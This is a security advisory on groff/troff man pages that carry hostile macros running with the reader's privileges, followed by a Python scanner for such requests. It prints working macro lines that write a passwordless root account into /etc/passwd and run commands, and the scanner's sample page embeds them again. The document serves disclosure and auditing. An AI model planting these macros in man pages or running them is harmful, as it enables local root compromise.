Title: Groff/Troff Malicious Manpage Vulnerabilities
Severity: MODERATE
Description:
Versions of GNU groff prior to release 1.11a and standard troff contain vulnerabilities that could lead to a local root compromise under the right conditions. A malicious user can, in theory, embed troff/groff macros inside man pages that will execute with the uid of the unknowing reader.
A groff example of this is a man page that, once read as root, will add another user to /etc/passwd with uid 0 and no password. The macro for this looks like this:
.opena stream /etc/passwd
.write stream r00t::0:0::/:/bin/sh
There are other groff macros that pose a threat if placed in a man page that root would view:
To execute a command and display the output:
.pso ls -l /root
While troff has fixed some of these, or at least disabled them by default, old vulnerabilities still exist, such as:
.sy and .pi
which respectively execute commands a la system() and pipe output to a program.
These problems have quietly existed and been known about for years, and it is questionable whether this is even a true vulnerability. When permissions are set properly, exploiting this should _not_ be possible, which makes this problem nothing more than an obscure backdoor at best.
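For auditing, the requests named above can be searched for in installed man pages before anyone renders them as root. The following is an added example, not part of the original advisory: the function names, the sample page and the choice to scan directories given on the command line are assumptions.

```python
import gzip
import re
import sys
from pathlib import Path

# Requests named in the advisory: file writes (.opena/.write) and
# command execution (.pso, .sy, .pi).
RISKY = ("opena", "write", "pso", "sy", "pi")

# A roff request line starts with a control character ('.' or the
# no-break form "'"), optional blanks, then the request name.
REQUEST_RE = re.compile(r"^[.'][ \t]*(%s)(?=\s|$)" % "|".join(RISKY))


def scan_text(text):
    """Return (line_number, request, line) for each risky request."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.match(line)
        if match:
            hits.append((number, match.group(1), line.strip()))
    return hits


def scan_file(path):
    """Scan one man page; installed pages are often gzip-compressed."""
    opener = gzip.open if path.suffix == ".gz" else open
    with opener(path, "rt", encoding="latin-1", errors="replace") as fh:
        return scan_text(fh.read())


# Constructed sample: a normal page header followed by the advisory's macros.
SAMPLE = """.TH DEMO 1
.SH NAME
demo \\- harmless looking page
.opena stream /etc/passwd
.write stream r00t::0:0::/:/bin/sh
.pso ls -l /root
A sentence that mentions .sy in running text is not a request.
"""

if __name__ == "__main__":
    for hit in scan_text(SAMPLE):
        print("sample:%d: .%s -> %s" % hit)
    for root in map(Path, sys.argv[1:]):
        for page in (p for p in root.rglob("*") if p.is_file()):
            for number, request, line in scan_file(page):
                print("%s:%d: .%s -> %s" % (page, number, request, line))
```

Any hit in a page outside the system's packaged documentation, or in a man directory writable by non-root users, is worth reviewing by hand.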
Affected Products:
- GNU groff 1.11.0a
- HP HP-UX 10.0.0
- HP HP-UX 11.0.0
- RedHat Linux 5.2.0 i386
- SGI IRIX 5.2.0
- SGI IRIX 5.3.0
- SGI IRIX 6.0.0
- SGI IRIX 6.0.1
- SGI IRIX 6.1.0
- SGI IRIX 6.2.0
- SGI IRIX 6.3.0
- SGI IRIX 6.4.0
- SGI IRIX 6.5.0
- SGI IRIX 6.5.1
- SGI IRIX 6.5.3